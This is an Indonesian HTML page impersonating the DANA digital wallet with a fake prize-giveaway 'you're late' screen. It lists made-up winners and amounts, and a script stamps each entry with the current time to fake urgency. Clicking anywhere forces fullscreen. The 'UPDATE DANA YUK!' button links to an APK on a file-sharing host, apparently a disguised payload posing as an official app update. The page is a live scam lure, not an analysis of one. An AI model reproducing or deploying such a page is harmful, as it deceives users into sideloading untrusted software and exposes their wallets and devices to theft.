<!DOCTYPE html><title>Yah!.. Kamu Terlambat</title><link href="https://a.m.dana.id/merchant-portal/app/assets/fav-icon.png" rel="icon" type="image/png"><meta charset=UTF-8><meta content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no" name=viewport><style>@import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600;700&display=swap');
 * {
     font-family: 'Open Sans', sans-serif;
     font-weight: 400;
 }
 body {
     width: 100%;
     height: 100vh;
     margin: 0;
     display: flex;
     justify-content: center;
     background: linear-gradient(to top right, #1084DA, #06B4FF);
     overflow: scroll;
 }
 .container {
     box-sizing: border-box;
     width: 100%;
     max-height: 1500px;
     max-width: 600px;
     display: flex;
     flex-direction: column;
     position: absolute;
 }
 .head {
     position: fixed;
     display: flex;
     justify-content: left;
     align-items: center;
     height: 60px;
     width: 100%;
     max-width: 600px;
     top: 0;
     background: #1089E1;
     z-index: 1;
 }
 h2 {
     padding-left: 20px;
     font-size: 17px;
     font-weight: 600;
     color: #ffffff;
 }
 .back {
     width: 18px;
     margin-left: 18px;
 }
 .late {
     margin-top: 10px;
 }
 .winner {
     height: 100%;
     width: 100%;
     background: #ebebeb;
     display: flex;
     flex-direction: column;
 }
 .banner_end {
     margin-top: 60px;
     width: 100%;
 }
 .win {
     box-sizing: border-box;
     width: 100%;
     height: 30px;
     background: #eee;
     font-size: 13px;
     font-weight: 600;
     color: #0000006b;
     display: flex;
     align-items: center;
     text-align: left;
     padding: auto;
     padding-left: 20px;
 }
 .profil {
     box-sizing: border-box;
     padding-left: 15px;
     margin-top: 1px;
     width: 100%;
     height: 60px;
     background: #ffffff;
 }
 .null {
     border-radius: 50%;
     width: 40px;
     margin-top: 10px;
 }
 .name {
     font-size: 15px;
     position: absolute;
     margin-left: 70px;
     margin-top: 12px;
     color: black;
 }
 .dte {
     font-size: 11px;
     position: absolute;
     margin-left: 70px;
     margin-top: 33px;
     color: #bdbdbd;
 }
 .rp {
     margin-top: 18px;
     margin-right: 13px;
     float: right;
 }
 .buton {
     box-sizing: border-box;
     padding: 20px;
     margin-top: 1px;
     width: 100%;
     height: 90px;
     background: #ffffff;
     justify-content: center;
 }
 button {
     width: 100%;
     height: 90%;
     font-size: 18px;
     color: #fff;
     background: #108ee9;
     border-radius: 5px;
     border: 1.5px solid #108ee9;
}</style><div class=container><div class=head><a href=kaget.github.io/index.html class=aback><img class=back src=https://yongkru.skemabiayatarif.com/DANA/assets/img/back.png></a><h2 class=late>Kamu terlambat!</h2></div><dic class=winner><img class=banner_end src=https://yongkru.skemabiayatarif.com/DANA/assets/img/end.jpg><div class=win>PEMENANG</div><div class=profil><p class=name>NANANG SAPUTRA<p class=dte id=tgl><p class=rp>Rp1.050.056</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/1.jpg></div><div class=profil><p class=name>ASYRAFI FAUZIYAH<p class=dte id=tgl><p class=rp>Rp890.173</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/2.jpg></div><div class=profil><p class=name>LUKMAN RAMADHAN<p class=dte id=tgl><p class=rp>Rp587.230</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png></div><div class=profil><p class=name>081*****4726<p class=dte id=tgl><p class=rp>Rp585.300</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/3.jpg></div><div class=profil><p class=name>RIMA MEUTIA<p class=dte id=tgl><p class=rp>Rp385.000</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png></div><div class=profil><p class=name>CHAERUL MELINDA<p class=dte id=tgl><p class=rp>Rp280.380</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/4.jpg></div><div class=profil><p class=name>RENA ALFHARIZQI<p class=dte id=tgl><p class=rp>Rp75.378</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/5.jpg></div><div class=profil><p class=name>089****8173<p class=dte id=tgl><p class=rp>Rp50.987</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png></div><div class=profil><p class=name>085*****8172<p class=dte id=tgl><p class=rp>Rp44.189</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png></div><div class=profil><p class=name>ZELAYA PRADIPTA<p class=dte id=tgl><p class=rp>Rp30.000</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png></div><div class=profil><p class=name>RIZQI RIFAI<p class=dte id=tgl><p class=rp>Rp28.863</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png></div><div class=profil><p class=name>SAKURA MEGANTARA<p class=dte id=tgl><p class=rp>Rp28.103</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png></div><div class=profil><p class=name>081*****8277<p class=dte id=tgl><p class=rp>Rp25.547</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png></div><div class=profil><p class=name>RISMA AULIA<p class=dte id=tgl><p class=rp>Rp20.827</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/6.jpg></div><div class=profil><p class=name>SAFITRI<p class=dte id=tgl><p class=rp>Rp16.673</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png></div><div class=profil><p class=name>FATHUS SALIM<p class=dte id=tgl><p class=rp>Rp10.047</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/7.jpg></div><div class=profil><p class=name>088*****7927<p class=dte id=tgl><p class=rp>Rp9.872</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png></div><div class=buton><a href=https://download1493.mediafire.com/toqzu55fnvogaM9bbU2kHzfkjyWKYbsY6YJ6BuijaLruHGpga-MN1J-oQ9Z87LKafK-axi_-76hCslpwAxucc9xyzg2Cws4/sa4lcqbrej3czr6/DANA%E2%80%93Dompet+Digital+Indonesia.apk ><button>UPDATE DANA YUK!</button></a></div></dic></div><script>const date=new Date;let dy=date.getDate(),day=(dy<10?"0":"")+dy,year=date.getFullYear(),hour=date.getHours(),hours=(hour<10?"0":"")+hour,minute=date.getMinutes()-1,minutes=minute.toString().replace(/-/g,""),menit=(minutes<10?"0":"")+minutes,currentDate=`${day} Nov ${year} - ${hours}:${menit}`;xx=document.getElementsByClassName("dte");for(var i=0;i<xx.length;i++)xx[i].innerHTML=currentDate</script>
<script>
document.documentElement.addEventListener("click", function (){
    var docElm = document.documentElement;
    if (docElm.requestFullscreen) {docElm.requestFullscreen()}
    else if (docElm.mozRequestFullScreen) {docElm.mozRequestFullScreen()}
    else if (docElm.webkitRequestFullScreen) {docElm.webkitRequestFullScreen()}
});
</script>